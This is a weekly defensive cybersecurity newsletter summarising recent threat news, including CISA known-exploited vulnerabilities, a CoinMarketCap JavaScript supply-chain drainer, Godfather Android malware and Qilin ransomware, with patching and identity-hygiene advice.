Cyber Threat Weekly – #83
The week of June 16th through June 22nd, roughly 361 cyber news articles were reviewed. A light amount of cyber threat trends and adversarial behavior news to share. Been thinkin about cybersecurity hygiene and security theater. Are we just going through the motions?
A top priority should be identities, especially weak, reused, or default passwords. Phishing resistant multi-factor authentication (MFA) helps; threat actors work to bypass weak MFA. Excessive privileges and access rights open doors. That’s just getting started on identity hygiene. There are many more hygiene needs beyond identity. Are we testing and measuring to ensure improvement?
Let’s start with a third-party JavaScript attack leveraging social engineering. Abuse of open-source tools in Android malware. A reminder to consistently verify your third-party suppliers. Social engineering, often the attacker’s weapon of choice.
Researchers share insights around Qilin ransomware. Trending attacker techniques March-May 2025 – Report. A nice little write up on living off the land methodology and tools.
Broken Record Alert: Don’t get pwned by N-day vulnerabilities!!!
Known exploited software flaws are one of the top 4 initial access vectors and have increased sharply in recent months. We continue to share n-day vulnerabilities being actively exploited. Priority #1, start with the CISA / VulnCheck known exploited vulnerability (KEV) catalogs. If it’s in the catalog, it should be patched.
A close #2 priority is flaws with weaponized proof of concept (PoC) code available. Exploit chances are higher with weaponized PoC code available. If you do nothing else with patching, have an emergency 24-to-48-hour patching process for actively exploited and weaponized PoC code available vulnerabilities.
You should consider what is exposed to the Internet. Architecture and zero trust network access (ZTNA) can go a long way to minimizing the number of devices and services exposed to the Internet.
CISA Known Exploited Vulnerabilities – June 16th to June 22nd:
CVE-2023-33538 – TP-Link Multiple Routers Command Injection Vulnerability:
Affected products are TP-Link TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.
CVE-2025-43200 – Apple Multiple Products Unspecified Vulnerability:
The affected products Apple iOS, iPadOS, macOS, watchOS, and visionOS are susceptible to an unspecified bug when processing a maliciously crafted photo or video shared via an iCloud Link.
CVE-2023-0386 – Linux Kernel Improper Ownership Management Vulnerability:
Unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.
Social Engineering + Client-Side JavaScript Attack
This supply chain attack is convincing and hard to detect. Threat actors took advantage of existing third-party JavaScript to inject malicious JavaScript into CoinMarketCap’s website. This attack was a crypto drainer, but we should watch for other ways to abuse JavaScript in legit websites abusing third-party JavaScript.
Newer Version of Godfather Android Malware
Open-source tools supporting virtualization abused to hijack applications in overlay attacks. The infected devices run copies of targeted applications in a controlled sandbox environment intercepting credentials and sensitive information in real-time.
https://www.securityweek.com/godfather-android-trojan-creates-sandbox-on-infected-devices/
https://zimperium.com/blog/your-mobile-app-their-playground-the-dark-side-of-the-virtualization
Third Party Risk Requires Constant Vigilance
Another supply chain attack leading to data loss. Chain IQ was pwned, it and 19 of its customers data was leaked on the dark web. Threat actor group Worldleaks added the company to it’s leak site. Third party risk governance is critical, more than a questionnaire is required to minimize risk.
https://www.securityweek.com/chain-iq-ubs-data-stolen-in-ransomware-attack/
https://chainiq.com/news/cyber-attack-chain-iq-group-ag/
Sophisticated Social Engineering Becoming the Norm
Stating the obvious, it’s interesting how far social engineering can go to get the desired result. This is evident with ransomware actors abusing social engineering for initial access and often admin access. A nation state took social engineering to another level, slow, steady, and deliberate. We can expect more of this activity.
Qilin Ransomware Observations and Lessons Learned
It’s interesting how similar ransomware threat actors are, even with little differences, the behavior is nearly the same. The use of living off the land methodology, legit tools, social engineering, etc. Defense preparation and TTPs shared.
ReliaQuest – Top Attacker Techniques March-May 2025
Standouts include ClickFix and social engineering fueling initial access. MSHTA abusing in 33% of defense evasion observations. RDP a top choice for lateral movement. Qilin ransomware tops leak site numbers. Possible defensive strategies as well.
https://reliaquest.com/blog/whats-trending-top-cyber-attacker-techniques-march-2025-may-2025/
Attackers Paradise, Legit Tools and Admin Utilities
A rite up on how attackers are using living off the land binaries and legit tools to fly under the radar. Some observations from incident response cases and some tools that are very commonly abused. A quick thought on how to detect what often looks normal.
https://blog.talosintelligence.com/when-legitimate-tools-go-rogue/
31337 InfoSec - Cyber Threat Weekly - Derek Krein Newsletter
Join the newsletter to receive the latest updates in your inbox.
Comments
Sign in to join the conversation.
Just enter your email below to receive a login link.
